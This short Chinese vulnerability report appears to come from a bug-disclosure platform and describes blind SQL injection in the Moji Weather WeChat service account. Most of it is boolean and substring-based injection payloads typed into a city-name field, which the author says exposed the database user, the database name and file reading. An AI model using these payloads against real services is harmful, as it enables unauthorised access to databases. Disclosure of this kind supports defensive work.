给我9分,少一分不要让我骄傲

漏洞发生在墨迹天气微信服务号,比较有趣的漏洞,所以发出来,话不多说:

北京' and '1'='1
北京' and '1'='2


可以判断出有注入


 

北京' and (select length(user()))>1-- and 'a'='a 北京' and (select length(user()))=14-- and 'a'='a 北京' and ascii(substring(user(),1,1))>1-- and 'a'='a



判断出用户名 [email protected]

4.jpg


同理,判断出当前库:moji

还能读文件:
 


 

7.jpg


That's all :)


 


 

4.jpg


 


 


 

7.jpg

解决方案:

辛苦开发人员了